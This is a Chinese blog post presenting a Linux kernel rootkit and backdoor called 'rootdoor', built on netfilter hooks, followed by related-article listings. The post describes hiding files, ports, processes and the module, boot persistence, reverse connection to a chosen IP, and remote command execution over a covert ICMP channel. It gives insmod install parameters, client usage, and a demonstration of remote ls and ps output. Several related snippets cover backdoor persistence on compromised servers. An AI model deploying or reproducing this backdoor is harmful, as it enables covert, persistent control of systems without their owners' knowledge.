利用netfilter hook开发llinux后门rootkit程序

最新推荐文章于 2024-04-25 11:10:40 发布
最新推荐文章于 2024-04-25 11:10:40 发布
阅读量1.3k 收藏
点赞数
文章标签: LKM linux rootkit 后门 netfilter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freeman1975/article/details/49301219
版权
rootdoor包括服务器端程序和客户端程序,在centos 6.5上面测试通过。
功能:
1、任意端口复用。端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。
2、隐藏网络连接,端口,文件以及目录。用linux工具无法查看到。
3、隐藏模块,开机启动。
4、反向连接。服务器定时连接指定的ip/port。
5、反调试,防止被跟踪和破解。内容加密传送。


rootdoor.ko设计要点:
1、server程序(rootdoor.ko)在安装时,会隐藏式启动一个后门进程(/home/freeman/hello)。
2、rootdoor在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息(hello),直到收到回应为止(hello)。
3、pc机给server回送hello消息时,可传送需要执行的脚本比如sh /home/freeman/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。


安装说明:
1.将hello/rootdoor.ko放到server的home/freeman目录下面。
mkdir /home/freeman
cp hello /home/freeman


2.将ping4放到客户机上面,任何一个目录均可。


在server中,如果用的是eth1,那么,安装参数是:
insmod rootdoor.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8 //damc/dip是目标机(client pc)的mac和ip,它是虚拟机2


ping4运行方法:
./ping4 192.168.2.8 192.168.2.113 //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就任意填一个。




测试说明:
在虚拟机1中,用的是eth1,那么,安装参数是:
insmod rootdoor.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8 //damc/dip是目标机(client pc)的mac和ip,它是虚拟机2


我在虚拟机2上跑ping4,结果如下:
[root@localhost ping]# ./ping4 192.168.2.9 192.168.2.113Please Enter bash command line[exit to quit]:
ls
cmdline=ls
Sending ICMP(C2S_HELLO)!192.168.2.9---->192.168.2.113
Please Enter bash command line[exit to quit]:
!!!Received S2C_HELLO_ACK!msg[]=
bin
boot
dev
etc
home
lib
lib64
lost+found
media
mnt
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var


ps
cmdline=ps
Sending ICMP(C2S_HELLO)!192.168.2.9---->192.168.2.113
Please Enter bash command line[exit to quit]:
!!!Received S2C_HELLO_ACK!msg[]=
  PID TTY          TIME CMD
    1 ?        00:00:01 init
    2 ?        00:00:00 kthreadd
    3 ?        00:00:00 migration/0
    4 ?        00:00:00 ksoftirqd/0
    5 ?        00:00:00 migration/0
    6 ?        00:00:00 watchdog/0
    7 ?        00:00:01 events/0
    8 ?        00:00:00 cgroup
    9 ?        00:00:00 khelper
   10 ?        00:00:00 netns
   11 ?        00:00:00 async/mgr
   12 ?        00:00:00 pm
   13 ?        00:00:00 sync_supers
   14 ?        00:00:00 bdi-default
   15 ?        00:00:00 kintegrityd/0
   16 ?        00:00:00 kblockd/0
   17 ?        00:00:00 kacpid
   18 ?        00:00:00 kacpi_notify
   19 ?        00:00:00 kacpi_hotplug
   20 ?        00:00:00 ata_aux
   21 ?        00:00:00 ata_sff/0
   22 ?        00:00:00 ksuspend_usbd
   23 ?        00:00:00 khubd
   24 ?        00:00:00 kseriod
   25 ?        00:00:00 md/0
   26 ?        00:00:00 md_misc/0
   27 ?        00:00:00 linkwatch
   28 ?        00:00:00 khungtaskd
   29 ?        00:00:00 kswapd0
   30 ?        00:00:00
exit
[root@localhost ping]# 


查看虚拟机1(server pc)上面的打印:dmesg
rootdoor: C2S_HELLO received!Send S2C_HELLO_ACK!
rootdoor: cmdline=ps
rootdoor: Net_SendIcmp(from:00:0c:29:87:bf:29,1,0x35)
rootdoor: This ICMP package with magic_word:0x5b is being stolen successfully!
rootdoor: C2S_HELLO received!Send S2C_HELLO_ACK!
rootdoor: cmdline=ls
rootdoor: Net_SendIcmp(from:00:0c:29:87:bf:29,1,0x35)
rootdoor: process:hello is killed!pid=3622
rootdoor: unload done.
去掉了一些不必要的打印如cmd_result[]。



草根大哥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
netfilter hook 注册,调用示例
08-17
Linux4.x内核编程实战——netfilter hook 注册,调用示例.nf_hook_ops,nf_register_net_hook, nf_unregister_net_hook 使用
基于Netfilter框架设计的软件防火墙过滤系统
qq_53928256的博客
05-05 1130
本此的防火墙设计是基于Netfilter框架设计的软件防火墙过滤系统基于学习和实践的目的,本次的防火墙设计主要面向于初学者,简单入门防火墙设计。所以本次只对源IP、目的IP地址、源端口、目的端口以及一些简单协议进行过滤。欢迎大家学习交流,如有不足之处,敬请批评指正!其实到这里,这个基于Netfilter框架设计的软件防火墙过滤系统就已经设计完毕了。啪啪啪啪啪啪!!!!
【漏洞预警】Linux kernel权限提升漏洞(CVE-2024-1086)
qq_18209847的博客
04-08 1万+
Linux内核版本v5.14 – v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低权限威胁者可利用该漏洞将权限提升为root。加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
Netfilter漏洞提权利用(CVE-2023-35001)
最新发布
蚁景网安学院
04-25 1047
Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。
Linux 多个留后门姿势
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
linux内核netfilter模块分析之:HOOKs点的注册及调用
热门推荐
OpenWrt/WLAN/驱动/Android/嵌入式开发总结
02-22 2万+
0:相关文档  linux 下 nf_conntrack_tuple 跟踪记录  其中可以根据内核提供的数据结构获取连接跟踪记录。  iptables 中的NAT使用总结    iptable的在防火墙上面的应用。 1:iptable中三个tables所挂接的HOOKs 其实这个问题很简单的运行iptables打开看看就知道,此处的hook与内核的hook是对应起来的。
Linux的Netfilter功能框架.pdf
09-07
Linux的Netfilter功能框架 NetfilterLinux 2.4内核实现数据包过滤、数据包处理、NAT等的功能框架。它提供了一个抽象、通用化的框架,相比之前的任何一版本Linux内核防火墙子系统都要完善强大。 Netfilter的功能...
基于NetfilterLinux防火墙.pdf
09-06
基于NetfilterLinux防火墙.pdf
使用NetFilter构建Linux防火墙.pdf
09-06
使用NetFilter构建Linux防火墙.pdf
Linux下基于Netfilter的防火墙设计.pdf
09-07
Linux下基于Netfilter的防火墙设计.pdf
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6276
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
linux运维电脑,Linux运维知识之linux 后门程序
weixin_42298064的博客
05-12 145
本文主要向你们介绍了Linux运维知识之linux 后门程序linux 后门linux 后门,通过详细的内容向你们展现,希望对各位学习Linux运维知识有所帮助。/*/*Gummo后门服务器/*编译:ccserver.c-oserver/*使用:./server&/*echo/tmp/server&>>/etc/rc.d/rc.local*/#include#inclu...
微软近日签名了一个流氓第三方驱动 Netfilter,该驱动包含在游戏社区中传播的 rootkit 恶意软件。
a18375956705的博客
06-28 424
6 月 28 日消息据外媒BleepingComputer,微软近日签名了一个流氓第三方驱动Netfilter,该驱动包含在游戏社区中传播的rootkit 恶意软件。 目前尚不清楚 rootkit 是如何通过微软的证书签名过程的,微软表示正在调查,并将“完善”签名过程、合作伙伴访问策略和验证。没有证据表明恶意软件作者窃取了证书,微软也不相信这是国家资助的黑客所为。 根据微软的说法,Netfilter 流氓驱动程序的影响有限,它针对游戏玩家,rootkit 只能在“后利用”中工作 —— 用户需...
Linux Netfilter中修改TCP/UDP Payload的方法
zxygww的专栏
11-06 5081
来自linux-2.6.36/net/ipv4/netfilter/nf_nat_helper.c 注:该代码可以移植到ebtables中使用,但需要注意struct rtable *rt结构在ebtables中是没有的。 修改UDP payload的代码: /* Unusual, but possible case. */ static int enlarge_skb(struct
内核中基于netfilter的编译选项
认真、专注、坚持
08-26 6088
转载地址:http://www.uddtm.com/server/iptables/146.html         在内核配置文件中要启用一些较要的选项包括Netfilter连接跟踪、日志记录和包过滤。iptables 是通过使用由Netfilter提供的内核中的框架来建立一个策略的。     对于2.6系列的内核来说,大多数的Netfilter编译选项都位于Networking--
linux 删除netfilter文件夹
07-25
要在Linux系统中删除netfilter文件夹,您可以使用以下命令: ``` sudo rm -r netfilter ``` 请注意,这是一个具有潜在风险的操作,因为它会永久删除netfilter文件夹及其所有内容。在执行此命令之前,请确保您有足够的权限,并且确认您希望删除该文件夹。删除操作是不可逆的,一旦文件夹删除,其中的数据将无法恢复,请谨慎操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

草根大哥

进军大神程序员路上,谢谢支持!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值